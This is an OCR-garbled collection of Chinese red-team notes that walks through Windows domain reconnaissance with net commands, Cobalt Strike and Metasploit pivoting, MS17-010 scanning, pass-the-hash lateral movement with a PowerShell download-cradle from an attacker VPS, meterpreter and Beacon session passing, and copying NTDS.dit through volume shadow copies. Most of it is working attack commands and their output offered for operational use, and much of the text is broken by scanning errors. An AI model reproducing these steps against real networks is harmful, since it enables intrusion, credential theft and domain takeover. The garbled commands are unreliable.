作用 : 在 域 中 添加 、 显 示 或 更 改 全 局 组 。 


net group “domain admins” /domain 获取 域 管 理 员 列 表 
net group "domain controllers" /domain 查看 域 控制 器 (如 果 有 多 台 ) 


net group /domain 查询 域 里 面 的 工作 组 


_net group 命 令 展 示 截 图 
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C: NWINDOWSNsystem32»not 





group "domain admins" /domain 
net group "domain admins" /domain 

群 组 名 称 Domain Admins 

广 解 指定 的 网 域 系 统管 理 员 


Administrator XXXXCL 
命令 执行 成 功 。 


C: NWINDOWSNsystem32»net group "domain controllers" /domain 
net group "domain controllers" /domain 

群 组 名 称 Domain Controllers 

RENE 人 在 网 域 所 有 的 网 域 控制 站 





RA 


XXXX2$ 
命令 执行 成 功 。 


C:iNWINDOWSNsystem32»net group /domain 


net group /domain 
\\、 的 群 组 帐户 


*pnsUpdateProxy 
*Domain Admins 
*Domain Computers 
*Domain Controllers 
*Domain Guests 
*Domain Users 
*Enterprise Admins 
*Group Policy Creator Owners 
*KLAdmins 
*KLOperators 
*Schema Admins 


f$ $8759, (BSIE—32 (85x. 


net localgroup 


功能 : 添加 、 显 示 或 更 改 本 地 组 
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- amem 2 - d bu 
net localhroup administrators 本 机 管理 员 [ 通 常 含有 4 


net localgroup administrators /domain 登录 本 机 的 域 管理 员 


net localgroup administrators workgroupNuser /add 域 用 户 添加 到 本 机 





| net localgroup 命 令 展示 截图 


C: NWINDOWSNsystem32»net localgroup administrators /domain 
net localgroup administrators /domain 

别名 administrators 

广 解 Administrators 可 以 完全 不 受 限 制 地 存 取 电 脑 /网 域 


成 员 


Administrator 
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| net localgroup 


rHAccess Control Assistance Operators 
FAdministrators 

Backup Operators 

Cryptographic Operators 


Hyper-V Administrators 

ITS IUSRS 

MKNetwork Configuration Operators 
Performance Log Users 
KPerformance Monitor Users 
Power Users 

HKRemote Desktop Users 

Remote Management Users 
*Replicator 

toystem Managed Accounts Group 


> net localgroup administrators 
administrators 


管理 员 对 计算 机 / 域 有 不 爱 限制 的 完全 访问 权 


i ES : > net localgroup users 
users 


防止 用 户 进行 有 章 或 无 意 的 系统 范围 的 更 改 ， 但 是 可 以 运行 大 部 分 应 用 程序 


AUTHORITY \Authenticated Users 
AUTHORITY \INTERACTIVE 
命令 成 功 完成 。 


net view 


作用 : 显示 域 列 表 、 计 算 机 列表 或 指定 计算 机 的 共享 资源 列表 。 





st view 查看 同一 域内 机 器 列表 
yet view \\ip 查看 某 IP 共 享 
net view \\GHQ 查看 GHQ 计 算 机 的 共享 资源 列表 。 


>t view /domain 查看 内 网 存在 多 少 个 域 





net view /domain:XYZ 查看 XYZ 域 中 的 机 器 列表 。 
”有 时 候 net view 无 法 列 出 计算 机 列表 ， 可 以 使 用 arp -a 查看 通信 的 内 网 IP 


net view SERRE 


”net view 目 标 不 在 域内 因为 不 在 域内 ， 所 以 报错 
i} 
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C:NUsersNuserNDesktop Va; 2iS T Bonet view xs 
fu diti ka S " 
系统 发 生 53 错误 。 


he ¥ Éj 


找 不 到 网 路 路 径 。 
前 提要 先 net use XXX .XXX ,XXX .XXX 建 立 宝 连接 ， 如 果 net view \XXX ,XXX .XXX.XXx 不 报错 ， 说 明 该 


C:\Users\user>net view \\XXX.XXX.XXX. XXX 
共用 资源 在 \\XXX. XXX XXX XXX 


共用 名 称 ”类 型 ”使 用 方式 ” 广 解 


NETLOGON Disk 登入 伺服 器 共用 
SYSVOL Disk 登入 伺服 器 共用 
命令 已 经 成 功 完成 。 


net view 目 标 在 域内 
C:\WINDOWS\system32>net view 
伺服 器 名 称 说 明 


\\servername 
命令 执行 成 功 。 


C:NWINDOWSNSystem32»net view /domain 
Domain 


XXXL 
XXX2SERVER 
SERVER 
XXXXXXX3 
WORKGROUP 
命令 执行 成 功 。 


C:NWINDOWSNsystem32»net view /domain:XXXXXXX3 
伺服 器 名 稳 说 明 


\\Servername 
命令 执行 成 功 。 


C:\WINDOWS\system32>net view /domain:XXX1 


伺服 器 名 称 说 明 
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. net user 


。 作用 : 添加 或 更 改 用 户 帐号 或 显示 用 户 帐号 信息 。 


net user 查看 本 机 上 的 用 户 帐号 列表 
net user Administrator 查看 本 机 用 户 Administrator 的 信息 
net user /domain 显示 所 在 域 的 用 户 名 单 


net user RAP /domain 获取 某 个 域 用 户 的 详细 信息 


net user /domain user 12345678 修改 域 用 户 密码 ， 需 要 域 管 理 员 权限 
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CobaltStrike 与 Metasploit 实 战 联动 


A 


BY 


il 


CobalStrike 5 Metasploit 均 是 渗透 利器 ， 各 有 所 长 。 前 者 更 适合 做 稳 控 平台 ， 后 者 则 更 擅长 内 网 
各 类 探测 搜集 与 漏洞 利用 。 两 者 更 需要 灵活 的 联动 ， 各 自 相互 依托 ， MATTERS 参透 的 效率 。 


内 置 Socks 功 能 


通过 Beacon 内 置 的 Socks 功 能 在 VPS 上 开启 代理 端口 ， 打 通 目标 内 网 通道 ， 之 后 将 本 地 Metasploit 
直接 带 入 目标 内 网 ， 进 行 横向 渗透 。 





首先 ， 到 已 控 目 标 机 的 Beacon 下 将 socks 代 理 开 启 。 


beacon > socks 1024 


Cobalt Strike View Attacks Reporting Help 
O80 B=eo st eh Pa 因而 


external internal ^ user computer 








Event Log x | Beacon 192.168.144.193@2796 X 
beacon> sleep 10 

[x] Tasked beacon to sleep for 10s 

[+] host called home, sent: 16 bytes 

beacon> socks 1024 

[+] started SOCKS4a server on: 1024 

[+] host called home, sent: 16 bytes 





点 开 菜单 栏 中 的 view > Proxy Pivots ， 复 制 代理 连接 到 Metasploit 中 。 


Cobalt Strike View Attacks Reporting Help 
a B N È Applications Pa & w» B E é 


external Credentials — | internal ~ 
=i a wmm Downloads m m um 
RY wm Event Log 
WESME Keystrokes 





an eee 
Screenshots oe s Jj 
; | EventLog X | Listeners X | Proxy Pivots X 
Script Console | |. 
Targets user computer pid type gu 
Web Log Ac | unnel via SOCKS E cp 


Use this command in the Metasploit Framework to tunnel 
exploits and auxiliary modules through this Beacon 
Use unsetg | Proxies t to ) Stop tunneling through. es. 


f setg P Proxies socksa: 149. T i LA 1024. i 


Ok 
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本 地 启动 Metasploit， 挂 上 代理 ， 就 可 以 对 目标 内 网 进行 各 种 探测 搜集 。 如 探测 目标 内 网 中 存在 
MS17_010 漏 洞 的 主机 ， 这 也 是 内 网 拿 主 机 权限 利用 方式 之 一 。 


msf5 > Setg Proxies socks4/5:ip:port 
msf5 > Setg ReverseAllowProxy 
msf5 > use auxiliary/scanner/smb/smb msi7. 010 


msf5 > rhosts 192.168.144.0/24 
msf5 > threads 100 
msf5 > run 


wd 49 

»|setg ReverseAllowProxy true 
ReverseAllowProxy -» true 
msf5 > use auxiliary/scanner/smb/smb_msi7_810 
msf5 auxiliary( } > set threads 100 
threads => 100 
msf5 auxiliary( ) > set rhosts 192.168.144.0/24 
rhos => +168.144.0/24 


msf5 auxiliary! ) > run 


192.168.144.0/24:445 -~ Scanned 36 of 255 hosts (14% complete) 
192. 168.144.0/24:445 Scanned 92 of 256 hosts (35% complete) 
192,168. 144.0/24:445 Scanned 99 of 256 hosts (38% complete) 
192.168.144.138:445 Host is likely VULNERABLE to MS17-@10! ~ Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit) 
192.168.144.155: 445 Host is likely VULNERABLE to MS17-@18! ~ Windows Server 26@3 3798 Service Pack 2 x86 {32-bit} 
192.168.144.0/24:445 Scanned 111 of 256 hosts (43% complete) 
192.168. 144, 0/24:445 Scanned 162 of 256 hosts (63% complete) 
192.168.144.163: 445 ~ Host is likely VULNERABLE to MS17-010! ~ Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) 
192.168.144.0/24:445 Scanned 169 of 256 hosts (66* complete) 
192.168.144.0/24:445 - Scanned 182 of 256 hosts (71% complete) 
192.168. 144.0/24:445 Scanned 234 of 256 hosts (91% complete) 
192.168.144.0/24:445 Scanned 258 of 256 hosts (97% complete} 
192. 168.144.0/24:445 - Scanned 256 of 256 hosts (180% complete) 
Auxiliary module execution completed 
msf5 auxiliary( ) > 





利用 MSF 模块 上 线 Beacon shell 


当 通 过 CobalStrike 的 Run Mimikatz 或 其 它 方式 抓 取 到 目标 机 或 其 内 网 中 某 台 Windows 机 器 的 本 
地 管理 员 了 明文 密码 或 hash 时 ， 可 以 利用 Metasploit 下 auxiliary/admin/smb/psexec_command 模 
块 ， 直 接 上 线 指定 目标 机 器 的 Beacon shell， 也 算是 一 种 简单 的 横向 方式 。 (前 提 目 标 机 可 出 网 ) 


先 利 用 CobalStrike 生 成 上 线 Beacon 的 powershell。 


Cobalt Strike View Attacks Reporting Help Scripted Web Delivery 
Da N BZ Packages È j & È B» e Ll B6 This attack hosts an artifact that delivers a Cobalt Strike — * 
ekternal 2 eb 3 Manage rf k Dasara a TECH. payload. The provided one-liner will allow you to quickly. 
WF" 192.168.144.1| Spear Phish Clone Site Administrator * URI Path: a 

Eternal Blue Host File | 


Local Host: 149.28. 





Local Port: 80 


Signed Applet Attack | 
Smart Applet Attack Listener: CS ” | i Add 


System Profiler Type powersheil * 





SUCCESS 


Started service: Scripted Web Delivery 
Copy and paste this URL to access it 


Ok 


本 地 启动 Metasploit， 挂 上 代理 ,设置 psexec command 模块 参数 。 
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msfS > setg Proxies socks4/5:ip:port 
msf5 > use auxiliary/admin/smb/psexec_ 


msf5 > rhosts 192.168.144.0/24 

msf5 > threads 10 

msf5 > smbuser administrator ; 
msf5 > smbpass aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800az 

msf5 > powershell.exe -nop -w hidden -c ; 
msf5 > run / 


.0/24:445 Scanned 67 of 256 hosts (26% complete) 
.0/24:445 Scanned 73 of 256 hosts (28% complete) 
.0/24:445 anned 101 of 256 hosts (39% complet 
Service start timed out, O running 
~ Service start timed out, 0 Tunning a C 
checking if the file is unlocked 
ecking if the file is unlocked à b o^ 
Unable to get handle: The server responded with error: STATUS SHARING VIOLATION (Comman WordCount 
and seems to still be executing. Try increasing RETRY and DELAY - 
ig the command output 
and finished with no output 
Executing cleanu ` 
Cleanup was successful 
Unable to get hand server responded with error: STATUS SHARING VIOLATION (Command=45 WordCount=0) 
Command seems to still be executing. Try increasing RETRY and DELAY 
Getting the command output 
d finished with no o 
Executing Cleanup... 
~ Cleanup was successful 
Scanned 113 of 256 hosts complete} 
Scanned 148 of 256 hosts complete) 
Scanned 158 of 256 hosts complete) 
Scanned 189 of 256 hosts complete) 
- Scanned 211 of 256 hosts complete) 
~ Scanned 248 of 256 hosts complete) 
~ Scanned 256 of 256 hosts (100% complete) 
| Auxiliary module execution completed 
msts auxiliary( ) > show options 


Module options (auxiliary/admin/smb/psexec_command): 


Name Current Setting i Required Description 


COMMAND C powersh new-object net.webclient).downloadstring( ‘http://149. 28 HT UEM The command y 
ou want to execute on the remote host 
RHOSTS 192.168.144,0/24 The target ho 





最 终 ， 只 要 密码 一 致 、 出 网 ， 且 未 被 杀 软 阻止 的 均 会 成 功 上 线 。 


CS 与 MSF 会 话 互 传 


CobaltStrike 派 生 Metasploit 


当 CobaltStrike 获 得 了 一 个 上 线 机 器 ， 想 把 这 个 目标 传 给 Metasploit 中 的 meterpreter， 获 得 一 个 
session 进 行 控制 。 在 Metasploit 执 行 以 下 命令 : 


msf5 > use exploit/multi/handler 


msf5 » payload windows/meterpreter/reverse tcp 
msf5 > lhost 10.11.42.99 
msf5 > lport 5353 


msf5 » run -j 


之 后 使 用 CobaltStrike 创 建 一 个 windows/foreign/reverse tcp 的 Listener。 其 中 IP 为 Metasploit 
的 监听 地 址 ， 端 口 为 Metasploit 所 监听 的 端口 。 
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| Event Log X Listeners X 











name * payload host port 





然后 选中 计算 机 ， 右 键 ->Spawn: 选择 MSF 的 监听 器 : 


external internal USer computer pid 





Choose a listener 





ariel PC NOR ee hosei ibaa) pora 
[usr windowsyforeignyreverse_ tep ee a 1142. LEM EE MEGA 
CS windows/beacon_ http/reverse.. http "192. 168. 144. 174 8099 
Pi 
Pi 


| 
| 
| 
E 





| Choose || Add || Help. 





BNET 


这 个 时 候 可 以 看 到 ，Metasploit 上 的 监听 已 经 上 线 ， 现 在 可 以 对 meterpreter 获 得 的 session 进 行 控 
制 。 


msf5 exploit(- UNI TEE Sending stage (180291 bytes) to 10.11.42.99 
| Meterpreter session 2 opened (10.11.42.99:5353 -> 10.11.42.99:52886) at 2019-10-21 16:30:15 +0800 


msf5 exploit( ) » sessions -i 2 
*} Starting interaction with 2... 


meterpreter » getuid 
Server username: NT AUTHORITY\SYSTEM 
meterpreter > ifconfig 


: Software Loopback Interface 1 
Hardware MAC : 00:00:00:00:00:00 
MTU : 4294967295 
IPv4 Address : 127.0.0.1 
IPv4 Netmask : 255.0.0.0 
IPv6 Address : ::1 
IPv6 Netmask : ffff:ffffiffff:ffff:ffff:ffff:TTff:ffff 


Interface 11 


: Intel(R) PRO/1000 MT Network Connection 
Hardware MAC : 00:0c:29:99:13:f8 
MTU : 1500 
IPv4 Address 





Metasploit 派 生 CobaltStrike 


现在 已 经 获得 了 一 个 meterpreter 的 session， 把 session 传 给 CobaltStrike。 


image-20191021161002473 


在 CobaltStrike 中 创建 一 个 监听 者 ， 和 上 一 步 类 似 ， 这 里 host 需 要 修改 为 CobaltStrike 客 户 端 I|P， 创 
建 好 之 后 便 监听 8099 端 口 ， 等 待 着 被 控 机 连接 。 
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| Event Log | X 


L 


[name payload 


Ie Em 


Listeners X 





port r beacons 








接 下 来 ， 把 meterpreter 获 得 的 session 转 交 给 CobaltStrike， 在 Metasploit 执 行 以 下 命令 


meterpreter > background 


msf5 > use exploit/windows/ /payload inject 
msf5 > payload windows/meterpreter/reverse_http 
msf5 > [host 192.168.144.174 

msf5 > lport 8099 

msf5 > DisablePayloadHandler 

msf5 > session 1 


msf5 > run 


解释 一 下 这 些 参数 。 由 于 CobaltStrike 的 监听 器 我 们 使 用 的 是 : 


windows/beacon http/reverse http 


所 以 我 们 的 payload 也 要 使 用 : 


payload windows/meterpreter/reverse http 


设置 本 地 监听 IP 和 端口 : 由 于 监听 器 是 CobaltStrike 的 ， 所 以 要 设置 成 CobaltStrike 机 器 的 IP 与 端 


Oe 


默认 情况 下 ，payload_inject 执 行 之 后 会 在 本 地 产生 一 个 新 的 handler， 由 于 我 们 已 经 有 了 一 个 ， 所 


以 不 需要 在 产生 一 个 ， 这 里 我 们 设置 : 


set DisablePayloadHandler true 


设置 当前 的 session， 执 行 run。 


meterpreter > getuid 

Server username: NT AUTHORITYNSYSTEM 
meterpreter » background 

{*] Backgrounding session 1... 


msf5 exploit( 
msf5 exploit( 


use exploit/windows/local/payload inject 
) > payload windows/meterpreter/reverse http 


payload => windows/meterprere (ARE ohare http 


msf5 exploit( 


) > lhost 192.168.144.174 


lhost -» 192.168.144.174 


msf5 exploit( 
lport -» 8099 
msf5 exploit( 


DisablePayloadHandler => true 


msf5 exploit ( 
session => 1 
msf5 exploit( 


lport 8099 
DisablePayloadHandler true 
session 1 


t) 


[*] Running module against WIN-63F4S53J408 
PID does not actually exist. 
Launching notepad.exe... 


[*] Preparing 
msf5 exploit( 


ADCs Met PTEE NEESS http' for PID 1000 
$ Jas 
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此 时 目标 机 便 已 成 功 从 CobaltStrike. 上 线 。 


To 
external internal user computer pid 
EN 192.168.144.171 192.168.144.171 SYSTEM* WIN-63F4SS3j4Q8 1000 





p 













10/21 15:50:28 w4 
10/21 16:00:13 ++ 


总 结 


关于 CobalStrike 与 Metasploit 的 联动 利用 方式 远 不 止 这 些 ， 每 种 方式 在 实战 中 都 有 对 应 的 应 用 场 
景 ， 更 需要 探索 与 总 结 。 


后 续 文 章 会 讲解 利用 CobalStrike 批 量 上 线 Beacon shell 的 不 同方 式 (目标 内 网 主机 出 网 与 不 出 网 
的 利用 ) 。 
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渗透 中 常用 的 复制 工具 


在 渗透 中 经 常 需 要 复制 像 NTDS.dit、mssql 数 据 库 文件 等 关键 文件 。 由 于 这 些 文件 都 被 占用 ， 所 以 
不 能 直接 复制 。 下 面 介绍 几 个 常用 的 命令 or 工具 来 实现 复制 。 


VSSadmin 
域 环境 默认 安装 。 
使 用 : 
。 创建 卷 影 
vssadmin create shadow /for=c: 
。 获取 当前 卷 影 
vssadmin list shadow 
。 从 卷 影 复 制 文件 


copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit 
c:\ntds.dit 


。 删除 卷 影 


vssadmin delete shadows /for=c: /quiet 


ntdsutil 
域 环境 默认 安装 
。 创建 快照 
ntdsutil snapshot "activate instance ntds" create quit quit 


。 挂 载 快照 


ntdsutil snapshot "mount {22508acf-8a01-4322-867d-383cf78f59e3}" quit quit 
快照 挂 载 为 C:NSSNAP 201912231558 VOLUMECSN , copy ntds 即 可 

。 ERRI 
ntdsutil snapshot "unmount {22508acf-8a01-4322-867d-383cf78f59e3}" quit quit 


。 删除 快照 


ntdsutil snapshot "delete {22508acf-8a01-4322-867d-383cf78f59e3}" create 
quit quit 


Vshadow 
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不 是 系统 默认 工具 ， 可 在 Microsoft SDK 中 获取 
。 创建 快照 


vshadow.exe -p -nw C: 


。 获取 快照 列表 
vshadow.exe -q 
。 复制 
copy Shadow copy device "Name"NwindowsNNTDSNntds.dit c:\ntds.dit 


。 删除 快照 


vshadow -ds={ID} 


Ninjacopy 


ninjacopy 是 powersploit 中 的 一 个 powershell 脚 本 直接 使 用 Invoke-Ninjacopy -Path < 需要 复制 的 
文件 > -LocalDestination < 复制 文件 保存 位 置 > 即 可 复制 


VolumeShadowCopyTools 


属于 powersploit 的 项 目 ， 地 址 VolumeShadowCopyTools， 之 前 遇 到 上 面 介绍 的 方法 都 不 能 复制 数 
据 库 文件 ， 使 用 这 个 工具 成 功 复制 
。 创建 卷 影 


New-VolumeShadowCopy -Volume C:\ 
。 列 出 卷 影 

Get -VolumeShadowCopy 
。 挂 载 卷 影 


Mount-VolumeShadowCopy -Path C:\Users\public -DevicePath N^? 
\GLOBALROOT\Device\HarddiskVolumeShadowCopyi 可 直接 在 挂 载 点 操作 了 


。 RER 


Remove-VolumeShadowCopy -DevicePath NM? 
\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 
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